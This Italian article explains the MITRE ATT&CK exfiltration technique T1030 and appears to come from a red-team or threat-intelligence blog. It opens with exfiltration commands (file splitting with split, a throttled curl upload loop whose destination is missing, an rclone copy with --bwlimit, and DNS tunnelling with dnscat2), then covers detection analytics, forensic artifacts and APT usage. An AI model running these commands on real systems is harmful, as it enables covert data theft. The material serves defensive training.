Esfiltrazione a Pezzetti: Data Transfer Size Limits (T1030)

Il concetto operativo è lineare: prendi un file, spezzalo, esfiltrane i pezzi a intervalli regolari e con dimensioni che non attirino attenzione. In un engagement red team, questa tecnica serve a testare se il SOC del cliente rileva trasferimenti "lenti e costanti" rispetto a quelli volumetrici e immediati.

Il primo scenario è il più classico: split su filesystem e invio sequenziale. Su Linux, il comando split fa tutto il lavoro pesante. Supponiamo di aver raccolto un archivio da esfiltrare:

split -b 1M -d collected_data.tar.gz chunk_

Questo genera file da 1 MB ciascuno — la stessa dimensione che APT28 utilizza nelle proprie operazioni. A questo punto un semplice loop con curl e un delay tra un invio e l'altro simula il comportamento reale:

for f in chunk_; do curl -X POST -F "file=@$f" ; sleep 30; done*

Il delay di 30 secondi distribuisce il traffico nel tempo, rendendo il pattern meno evidente nei log NetFlow.

Su Windows, PowerShell offre tutto il necessario senza dipendenze esterne. Per spezzare un file in blocchi da 2048 byte — lo stesso chunk size usato da POSHSPY — si può usare uno script che legge il file con [IO.File]::ReadAllBytes() e lo scrive in porzioni con [IO.File]::WriteAllBytes(), iterando offset e lunghezza.

Per l'esfiltrazione via DNS — il canale più subdolo — Kessel e Helminth mostrano la strada: incapsulare i dati nei sottodomini delle query. In laboratorio, dnscat2 (open source) permette di replicare fedelmente questo scenario. Il client invia dati frammentati in query TXT o CNAME verso un server autoritativo controllato dal red team, con chunk che rispettano il limite di 63 caratteri per label DNS.

Cobalt Strike (a pagamento) implementa nativamente il chunking dei dati, ed è il tool usato nella campagna C0015. Per simulare un'esfiltrazione throttled, Rclone (open source) offre il flag --bwlimit che limita la banda — esattamente ciò che gli attori di C0015 hanno fatto. La sintassi è diretta:

rclone copy /path/to/staging remote:bucket --bwlimit 100k --transfers 1

Il parametro --transfers 1 forza un singolo stream, rendendo il traffico ancora meno appariscente. Per testare lo scenario "chunker", Rclone supporta un overlay che spezza automaticamente i file grandi in porzioni durante l'upload.

Su macOS, il test può sfruttare la creazione di un LaunchAgent che esegue periodicamente uno script di upload — scenario coerente con l'analytic AN0598, che monitora proprio i trasferimenti da processi lanciati tramite launchd.

Il problema fondamentale con T1030 è che, presa singolarmente, ogni trasmissione appare legittima. Un pacchetto da 1500 byte non allarma nessuno. La chiave è rilevare il pattern ripetitivo: stessa dimensione, stesso intervallo, stesso processo sorgente.

Su Windows, la detection strategy DET0213 si appoggia a Sysmon e ai dati di flusso di rete. L'analytic AN0596 cerca processi che stabiliscono connessioni outbound con pacchetti di dimensione uniforme a intervalli regolari. I parametri di tuning critici sono tre: la soglia PacketSizeThreshold (ad esempio 512 o 1024 byte), la finestra temporale IntervalRepeatWindow entro cui cercare ripetizioni, e la lista KnownServicePorts per escludere traffico legittimo sui protocolli attesi. L'evento Sysmon EventCode 3 (Network Connection) correla processo e destinazione; incrociandolo con i dati NetFlow si ottiene il profilo dimensionale del traffico.

Su Linux, l'analytic AN0597 usa auditd con la syscall connect per identificare i processi che generano connessioni outbound. Il tuning richiede un baseline dei binari attesi (ProcessNetworkBaseline — tipicamente curl, wget, apt) e una soglia di varianza sul payload: se la deviazione dimensionale resta entro il ±5%, il trasferimento è classificato come "fixed size" e va investigato. Il parametro RepeatFrequencyThreshold definisce quante trasmissioni per minuto o per ora costituiscono un'anomalia.

Su macOS (AN0598), il focus si sposta sui LaunchAgent e sul contesto utente. I log Unified Log e Endpoint Security catturano sia il processo che il contesto di esecuzione (privilegiato o user-level). La metrica TransferSizeMedian identifica i chunk fissi, mentre TransferProtocolOutlier segnala protocolli inattesi verso destinazioni specifiche.

Alcune raccomandazioni operative trasversali per ridurre i falsi positivi:

• Correla con la staging phase: un alert su chunk fissi acquisisce priorità se preceduto da attività di compressione o cifratura (T1560)
• Monitora il DNS: query con sottodomini di lunghezza anomala e frequenza elevata verso un singolo dominio sono un indicatore forte di esfiltrazione via DNS — il canale usato da Kessel e Helminth
• Soglie adattive: le soglie statiche vengono aggirate facilmente; meglio calcolare deviazioni standard sulla dimensione dei payload per connessione e segnalare quelle con varianza prossima allo zero

L'implementazione di Network Intrusion Prevention (M1031) con firme specifiche per il traffico C2 dei malware noti — OopsIE sui 1500 byte, RDAT sui 102.400 byte — completa la postura difensiva con un livello di blocco attivo.

L'analisi forense di un'esfiltrazione frammentata parte quasi sempre dalla rete e converge sul filesystem. Il primo artefatto da cercare sono i file temporanei di split: frammenti con naming sequenziale (.part01, .001, chunk_00) nelle directory di staging. Molti malware — e gli stessi tool di archivio legittimi — lasciano queste tracce.

Su Windows, la ricostruzione inizia dalla MFT ($MFT). Cercate entry con timestamp di creazione ravvicinati, dimensione identica e naming pattern coerente. Lo strumento MFTECmd (open source, progetto Eric Zimmerman) parsifica la MFT e permette di filtrare per dimensione e intervallo temporale. Un cluster di file da esattamente 3 MB creati a pochi secondi di distanza — come nella campagna C0026 — è un segnale inequivocabile.

I Prefetch (C:\Windows\Prefetch) rivelano l'esecuzione dei tool utilizzati per lo split. Se trovate tracce di rar.exe, 7z.exe o rclone.exe nel Prefetch, incrociate il timestamp con le entry MFT dei frammenti. Nei casi riconducibili a Threat Group-3390 e Play, gli archivi RAR venivano splittati prima dell'invio.

La ShimCache (AppCompatCache) e l'AmCache forniscono evidenza storica dell'esecuzione anche dopo la cancellazione dei binari. Per i tool come Rclone — usato in C0015 — questi artefatti possono essere l'unica prova rimasta se l'attaccante ha fatto cleanup.

Sul versante rete, i log di flusso sono fondamentali. I record NetFlow o i log del proxy con il campo Content-Length permettono di ricostruire la sequenza di upload. Cercate connessioni HTTP POST ripetute verso lo stesso endpoint con payload di dimensione costante — 102.400 byte per RDAT, 1500 byte per OopsIE. Wireshark (open source) e tshark permettono di filtrare per dimensione frame e aggregare per destinazione.

Su Linux, auditd con regole sulla syscall sendto cattura i trasferimenti outbound. Incrociate questi eventi con i log del filesystem (inotify o fanotify se configurati) per correlare creazione dei chunk e invio. I metadati stat dei file residui — ctime, mtime, atime — ricostruiscono la sequenza operativa.

Per l'esfiltrazione DNS, i log del resolver o una cattura PCAP sono indispensabili. Ogni query verso il dominio C2 trasporta un frammento — nel caso di Helminth, chunk da 23 byte codificati nei sottodomini. Strumenti come passivedns (open source) ricostruiscono la sequenza temporale delle query e il volume totale esfiltrato.

Cinque gruppi APT documentati usano T1030, ma con approcci e motivazioni distinti che rivelano il livello di sofisticazione operativa di ciascuno.

APT28 — il gruppo legato al panorama russo di cyber-espionaggio — frammenta i file in chunk inferiori a 1 MB. La soglia è calibrata per eludere i DLP più comuni, che spesso monitorano trasferimenti superiori a determinate dimensioni. Questo approccio chirurgico è coerente con operazioni di intelligence mirate, dove il volume esfiltrato è selezionato con cura.

APT41 divide i payload post-exploitation in chunk di dimensione fissa, un comportamento che riflette il doppio profilo del gruppo — espionage e attività a scopo finanziario — dove l'evasion è prioritaria in entrambi i contesti. La frammentazione non è solo tattica ma integrata nella catena di delivery del malware.

Threat Group-3390 utilizza archivi RAR splittati, una tecnica più tradizionale ma efficace. Il pattern è condiviso con Play, che opera nel dominio ransomware e frammenta i file delle vittime prima dell'esfiltrazione. Questa convergenza tra gruppi di espionage e gruppi ransomware sulla stessa tecnica indica che T1030 è diventata una procedura operativa standard, non una firma distintiva.

LuminousMoth presenta un caso interessante: lo split è motivato da un vincolo infrastrutturale specifico, un limite di 5 MB sul canale di esfiltrazione. Questo suggerisce che il gruppo utilizza infrastruttura condivisa o a basso costo con restrizioni di upload — un indicatore utile per il profiling dell'infrastruttura C2.

La campagna C0026, attribuita con elevata confidenza al cluster Turla, mostra un uso maturo della tecnica: archivi cifrati splittati in parti da 3 MB prima dell'esfiltrazione, nel contesto di un'operazione che riutilizzava domini C2 di Andromeda per colpire vittime in Ucraina. La campagna C0015, un'intrusione ransomware con Bazar, Cobalt Strike e Conti, dimostra invece l'uso di Rclone con bandwidth limiting — una variante di T1030 che non frammenta i file ma rallenta il flusso.

Il trend emergente è la commoditizzazione: tool come Rclone e Cobalt Strike rendono T1030 accessibile a qualsiasi operatore, dai gruppi nation-state ai team ransomware che seguono playbook pubblici. Per l'analista TI, il valore discriminante non è più la tecnica in sé ma la dimensione del chunk: 23 byte in DNS (Helminth), 1500 byte in HTTP (OopsIE), 3 MB in archivi (C0026). Questa firma dimensionale, incrociata con il canale di esfiltrazione, resta un indicatore affidabile per l'attribuzione.

Framework MITRE ATT&CK v16 — T1030 (Data Transfer Size Limits), TA0010. Campagne: C0026, C0015. Mitigazione: M1031. Detection: DET0213, analytics AN0596/AN0597/AN0598. Integrato con conoscenza professionale per tool e procedure operative.